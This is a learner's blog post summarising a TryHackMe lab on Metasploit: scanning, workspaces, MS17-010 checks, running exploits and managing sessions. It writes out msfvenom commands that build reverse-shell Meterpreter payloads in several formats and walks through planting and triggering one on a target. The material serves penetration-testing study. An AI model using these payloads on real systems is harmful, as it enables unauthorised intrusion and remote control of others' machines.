Today we are going to learn how to use Metasploit for vulnerability scanning and exploitation.
Let’s start our daily #FromZeroToHacker challenge.
Table of contents |
Introduction |
What have I learnt today? |
Stats |
Resources |
Introduction to Metasploit Exploitation
Today we are going to learn how to use Metasploit for vulnerability scanning and exploitation.
We will also cover how the database feature makes it easier to manage penetration testing engagements with a broad scope. Also, we will generate payloads with msfvenom and start a Meterpreter session on most target platforms
What have I learnt today?
Scanning
Port scanning
We can list all the modules that scan open ports using the search portscan
command.
We can load one module using use <NUMBER>
as we saw in yesterday’s lesson and make Metasploit list all the options available:
We need to set up values for 7 options! Luckily, most of them have a default value.
But we can also run nmap
from Metasploit too:
UDP service identification
The scanner module scanner/discovery/udp_sweep
will allow you to quickly identify services running over the UDP (User Datagram Protocol). While it doesn’t run an extensive scan of all possible UPD services, provides a quick way to identify services such as DNS or NetBIOS:
SMB Scans
Metasploit also offers auxiliary modules that allow us to scan specific services. For example, SMB (Server Message Block, from Windows). Let’s see an example of scanner/smb/smb_version
:
We shouldn’t omit exotic services such as NetBIOS (Network Basic Input Output System), as it allows computers to communicate with each other over the network, to share or send files to printers. For example, the NetBIOS name could reveal important information such as the role of the computer (DEV-OPS, SALES, CEO). We can also find shared files and folders that could be accessed either without a password or protected with a simple password (admin, administrator, 1234…).
Metasploit has many modules that can help us have a better understanding of the target system: It is always worth performing a quick search to see if we can find extra information.
The Metasploit Database
Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values. First, we need to start a PostgreSQL database with systemctl start postgresql
. Then, we start the Metasploit Database with msfdb init
.
Then, launch msfconsole
and check the database status with db_status
:
Now, we can create different workspaces to isolate different projects. We should be in the default workspace:
Add a new workspace with -a <NAME>
or delete an existing one with -d <NAME>
:
We can navigate between workspaces with workspace <WORKSPACE_NAME>
:
You can use workspace -h
to list all the options available:
If we run a module, for example, db_nmap
, all results will be saved to the database:
We can reach now the information relevant to hosts and services with the hosts
and services
commands:
Example overflow
- We will use the vulnerability scanning module that finds potential MS17-010 vulnerabilities with
use auxiliary/scanner/smb/smb_ms17_010
command. - Set the RHOSTS value using
hosts -R
. - Check if all values are assigned correctly with
show options
. - Launch the exploit with
exploit
orrun
.
You may want to look for classic vulnerabilities in:
- HTTP: Could potentially host a web application where you can find SQL vulnerabilities or RCE.
- FTP: Could allow anonymous login.
- SMB: It may be vulnerable to SMB exploits like MS17-010.
- SSH: Could have default or easy-to-guess credentials.
- RDP: It may be vulnerable to Bluekeep or allow desktop access if weak credentials are used.
Vulnerability scanning
Metasploit allows you to identify easy critical vulnerabilities or low-hanging fruit. For example, if we identify a VNC service, we may use search vnc
on Metasploit to list useful modules.
We can use info
in any module to have more information about how it works, how to use it, its purpose, etc:
Exploitation
Exploits is the most populated module category. Not a surprise, since Metasploit is an exploitation framework.
We have used search
to search for exploits, info
to dump more info about the exploit, and finally, we launched it with exploit
or run
.
This process seems simple, but a successful outcome depends on a great understanding of the services running on the target system.
Most exploits have a preset default payload that we can list with show payloads
:
Once we have decided on the payload, we can select it with set payload <NUMBER>
:
![[day_055_set_payload.png]]
Remember that finding a working payload can become a trial-and-error process due to firewalls, anti-virus, configurations, etc.
Some payloads will open new parameters that we need to set; running show options
will display them.
Let’s run
the exploit: This will create a session. This session can be backgrounded using CTRL+Z
or aborting it with CTRL+C
.
Backgrounding a session will be useful when working on more than one target at the same time, or using the same target but with a different exploit.
Working with sessions
The sessions
command will list all the active sessions (like the one we just backgrounded). sessions -i <NUMBER>
will foreground or load the session selected.
Msfvenom
Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads. Msfvenom will allow you to create payloads in many different formats (.php, .exe, .dll, .elf, etc) and for many different target systems (Linux, Windows, Android, etc).
Output formats
We can generate either stand-alone payloads (executables for Meterpreter) or a usable raw format (python, php…). msfvenom --list formats
command can be used to list supported output formats.
Encoders
As the name says, this encodes the payload. Despite some beliefs, this is not used to bypass antivirus, as there are better options for that.
Handlers
Sometimes we need to be able to intercept incoming connections generated by the Msfvenom payload to create a reverse shell. This is automatically handled by the exploit module. Reverse shells or Meterpreter callbacks generated in our MSFvenom payload can be easily caught using a handler.
Imagine that we want to exploit a file upload vulnerability present in DVWA (Damn Vulnerable Web Application). The exploit steps are:
- Generate the PHP shell using Msfvenom.
- Start the Metasploit handler.
- Execute the PHP shell.
Msfvenom requires a payload, the local machine IP address, and the local port that will be used as a listener:
Warning: The output PHP file misses the starting PHP tag. This file should be edited to convert it into a working PHP file.
With the reverse shell code created, we can use Multi Handler to receive the incoming connection with use exploit/multi/handler
.
Now, we just need to run
the handler and wait for the incoming connection.
Other payloads
Depending on the target configuration (OS, webserver, etc) msfvenom can be used to create payloads in almost all formats.
In all these examples, LHOST is the target’s IP, and LPORT is the port where our handler will listen.
Linux Executable and Linkable Format (.elf)msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LP
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f elf > <FILENAME>.elf
The .elf format is executable for Linux. Remember to use chmod +x <FILENAME>.elf
to give executable permissions. Then, ./<FILENAME>.elf
to run the code.
Windowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f exe > rev_shell.exe
PHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f raw > <FILENAME>.php
ASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f asp > <FILENAME>.asp
Pythonmsfvenom -p cmd/unix/reverse_python LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f raw > <FILENAME>.py
All of these examples are reverse payloads, meaning that we will need to have the exploit/multi/handler module listening on our attacking machine. Remember to set up the payload, LHOST and LPORT parameters.
This is an example of an attack using msfvenom:
First, we create a meterpreter payload in the .elf format and we give it permissions:
Then, we start a Python web server to serve the file to the target computer once we are inside:
Then, we login inside the target computer with SSH:
Once we are inside, get permission to download the file and download it with wget
:
The file is transferred. Stop the python3 server and instead start msfconsole, use exploit/multi/handler
, configure it using the payload, the IP and the port values we used during the creation of the payload during the first step, then run it to create a listener:
Now, give permissions to the .elf file downloaded, run it and your msfconsole will get a meterpreter line: The hack has been successful 🙂
Summary
Things we learned today:
- How to scan target systems using Metasploit.
- How to use the Metasploit database feature.
- How to use Metasploit to conduct a vulnerability scan.
- How to use Metasploit to exploit vulnerable services on target systems.
- How
msfvenom
can be used to create payloads and obtain a Meterpreter session on the target system.
Stats
From 77.283th to 76.355th.
Here is also the Skill Matrix:
Resources
Path: Jr Penetration tester
Metasploit
TryHackMe: Metasploit Exploitation
Other resources
Metasploit: Introduction
SQL Injection attacks
What the Shell? Part 2